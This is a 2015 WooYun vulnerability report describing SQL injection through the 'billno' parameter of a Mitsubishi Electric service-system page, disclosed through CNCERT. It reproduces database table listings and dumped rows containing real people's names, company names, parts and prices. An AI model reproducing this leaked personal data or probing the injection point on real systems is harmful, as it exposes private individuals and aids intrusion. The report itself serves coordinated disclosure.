当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142160

漏洞标题:三菱电机某系统SQL注入(大量订单/公司/姓名/零件/价格泄露)

相关厂商:三菱电机

漏洞作者: 深度安全实验室

提交时间:2015-09-22 17:52

修复时间:2015-11-08 15:16

公开时间:2015-11-08 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

rt

详细说明:

三菱电机售后服务系统 如下链接存在SQL注入,其中,billno参数有问题

http://**.**.**.**/saec-point/servicesheetlook.aspx?billno=1374092&no=3

1.png


涉及7个库

2.png

漏洞证明:

以SAECdb库为例,涉及1468个表

Database: SAECdb
[1468 tables]
+-----------------------------------------------+
| 2013fix1                                      |
| 2013fix1                                      |
| 2013fix3                                      |
| 2013fix4                                      |
| 2013fix5                                      |
| 2013fix6                                      |
| 2013fixv                                      |
| 2013年惠民机信息                                          |
| AllDate                                       |
| BY_BUY_LIST_REPROT_BILL_DETAIL                |
| BY_BUY_LIST_REPROT_BILL_DETAIL                |
| B_AREAUSER                                    |
| B_AirConType                                  |
| B_Area                                        |
| B_BillLevel                                   |
| B_CallBackItem                                |
| B_CallBackitemresult                          |
| B_CallRate                                    |
| B_CheckItem                                   |
| B_CheckManContent                             |
| B_Checktime                                   |
| B_Class                                       |
| B_Complaint                                   |
| B_ConsignComp                                 |
| B_County                                      |
| B_DelMoney                                    |

修复方案:

以SAECdb库、

Database: SAECdb
Table: F_NewSubAccount1
[50 entries]
+------------------------+-------------------+-----------+--------------------+-----------+-----------+-------------+
| Billno                 | UnitName          | PartName  | CreateTM           | CUnitName | Costprice | MarketPrice |
+------------------------+-------------------+-----------+--------------------+-----------+-----------+-------------+| 061126258              | 上海市长宁区鑫宇商行        | 压缩机       | 01 24 2007  6:05PM | 张达平       | 264.9600  | 850.0000    |
| 061126171              | 上海市长宁区鑫宇商行        | 电子膨胀阀     | 01 24 2007  6:48PM | 丁月珍       | 41.9700   | 54.0000     |
| 061126285              | 上海市长宁区鑫宇商行        | 压缩机       | 01 24 2007  8:52PM | 高仲良       | 786.1200  | 1300.0000   |
| 061126269              | 上海市长宁区鑫宇商行        | 室内电控板     | 01 24 2007 10:20PM | 张力        | 120.0000  | 200.0000    |
| 0707582                | 上海飞祥制冷设备有限公司      | 室内电控板     | 01 24 2008  1:23PM | 瞿小姐       | 120.0000  | 200.0000    |
| 0726361                | 上海同菱制冷设备工程部       | 室内电控板     | 01 24 2008  3:47PM | 宋祖岗       | 120.0000  | 200.0000    |
| 050004636              | 上海佰友家用电器有限公司      | 压缩机       | 01 24 2008  3:51PM | 孙建国       | 405.9800  | 1000.0000   |
| 0723853                | 上海飞祥制冷设备有限公司      | 室内电控板     | 01 24 2008  4:10PM | 许小姐       | 120.0000  | 200.0000    |
| 061126234              | 上海市长宁区鑫宇商行        | 室内电控板     | 01 25 2007  2:59PM | 黄忠民       | 120.0000  | 200.0000    |
| 061126235              | 上海市长宁区鑫宇商行        | 室内管温热敏电阻  | 01 25 2007  4:57PM | 黄怡        | 7.1400    | 10.0000     |
| 060162582              | 上海市长宁区鑫宇商行        | 室内右边板     | 01 25 2007  7:05PM | 江飙        | 30.1100   | 40.0000     |
| 60135160               | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 01 25 2007 10:07AM | 张云佳       | 120.0000  | 200.0000    |
| 060141849              | 上海义博实业发展有限公司      | 步进电机组件    | 01 25 2008  5:12PM | 徐安定       | 5.3000    | 15.0000     |
| 732141                 | 帮帮曹杨家用电器维修服务社     | 电子膨胀阀     | 01 25 2008  7:07PM | 张琳        | 32.8200   | 42.0000     |
| 728980                 | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 01 25 2008 10:29PM | 施健        | 120.0000  | 200.0000    |
| 0720800                | 上海芷兰电器有限公司        | 步进电机组件    | 01 29 2008  1:49PM | 陈建彬       | 5.3000    | 15.0000     |
| 60135229               | 帮帮曹杨家用电器维修服务社     | 贯流风叶      | 01 30 2007  9:23AM | 杨菲璐       | 18.6600   | 30.0000     |
| 60135132               | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 01 30 2007  9:41AM | 陈戚华       | 120.0000  | 200.0000    |
| 60135247               | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 01 30 2007 10:05AM | 郑焱        | 120.0000  | 200.0000    |
| 60135248               | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 01 30 2007 10:13AM | 郑焱        | 120.0000  | 200.0000    |
| 60135664               | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 01 30 2007 10:59AM | 柏维康       | 94.0400   | 200.0000    |
| 60135669               | 帮帮曹杨家用电器维修服务社     | 显示器组件     | 02  1 2007  3:08PM | 张洪根       | 27.6200   | 50.0000     |
| 0723809                | 上海飞祥制冷设备有限公司      | 室内电控板     | 02  2 2008 12:33PM | 陈         | 120.0000  | 200.0000    |
| 0709072-1              | 上海飞祥制冷设备有限公司      | 室内电控板     | 02  3 2008  1:06PM | 张先生       | 120.0000  | 200.0000    |
| 0723898                | 上海飞祥制冷设备有限公司      | 室内电控板     | 02  3 2008  1:34PM | 徐先生       | 120.0000  | 200.0000    |
| 60135250               | 帮帮曹杨家用电器维修服务社     | 电源连接线     | 02  4 2007 10:46AM | 顾锡扬       | 27.2000   | 35.0000     |
| 0723866                | 上海飞祥制冷设备有限公司      | 轴承座组件     | 02  5 2008 12:42PM | 施先生       | 2.5000    | 4.0000      |
| 723634                 | 帮帮曹杨家用电器维修服务社     | 离心电机      | 02  9 2008  2:07PM | 丁长友       | 91.0000   | 150.0000    |
| 723659                 | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 02  9 2008  7:34PM | 陆社平       | 120.0000  | 200.0000    |
| 060048482              | 上海杨浦区兰花制冷维修服务部    | 贯流风叶      | 02 10 2007  3:43PM | 居小遥       | 18.6600   | 30.0000     |
| 060169273              | 上海杨浦区兰花制冷维修服务部    | 显示器组件     | 02 12 2007  3:42PM | 董兴龙       | 33.0000   | 50.0000     |
| 723692                 | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 02 12 2008  2:34PM | 徐玉美       | 120.0000  | 200.0000    |
| 733110                 | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 02 12 2008  2:38PM | 方伟        | 120.0000  | 200.0000    |
| 733111                 | 帮帮曹杨家用电器维修服务社     | 室内电控板     | 02 12 2008  4:20PM | 陈磊        | 120.0000  | 200.0000    |
| 060169277              | 上海杨浦区兰花制冷维修服务部    | 电源连接线     | 02 14 2007  9:03AM | 杨声荣       | 19.4300   | 25.0000     |
| 60135724               | 帮帮曹杨家用电器维修服务社     | 冷凝器       | 02 15 2007  6:23PM | 陈刚        | 172.9700  | 220.0000    |
| 060169291              | 上海杨浦区兰花制冷维修服务部    | 出风板组件     | 02 16 2007  9:20AM | 朱晨平       | 5.3000    | 60.0000     |
| 0723836                | 上海飞祥制冷设备有限公司      | 室内电控板     | 02 17 2008  2:33PM | 汤先生       | 120.0000  | 200.0000    |
| 0709072-2              | 上海飞祥制冷设备有限公司      | 室内电控板     | 02 18 2008  2:51PM | 张小姐       | 120.0000  | 200.0000    |
| 0804317                | 上海飞祥制冷设备有限公司      | 室内电控板     | 02 18 2008 12:51PM | 陈先生       | 120.0000  | 200.0000    |
| 060168430              | 上海市长宁区鑫宇商行        | 室内电控板     | 02 19 2007  2:04PM | 金宝兴       | 120.0000  | 200.0000    |
| 061126257              | 上海市长宁区鑫宇商行        | 压机电容30μf  | 02 19 2007  2:59PM | 蔡国伟       | 9.5500    | 28.0000     |

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-24 15:16

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论